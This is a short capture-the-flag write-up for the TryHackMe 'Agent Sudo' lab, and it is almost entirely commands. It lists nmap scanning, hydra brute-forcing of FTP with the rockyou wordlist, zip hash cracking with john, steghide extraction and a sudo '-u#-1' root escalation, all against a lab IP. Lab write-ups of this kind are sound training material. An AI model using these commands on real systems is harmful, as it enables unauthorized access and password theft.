tryhackme: agent sudo [writeup]

Enumeration

nmap -p- -A -T4 10.10.1.238

Hash cracking and brute-force

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.1.238 -I

sudo zip2john 8702.zip > zip.hash

john — format=zip — wordlist=/usr/share/wordlists/rockyou.txt zip.hash

steghide extract -sf cute-alien.jpg

Capture the user flag

cat user_flag.txt

scp james@10.10.1.238:Alien_autospy.jpg ~/Desktop

Alien_autospy.jpg

Privilege escalation

sudo -l

sudo -u#-1 /bin/bash

Conclusion

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store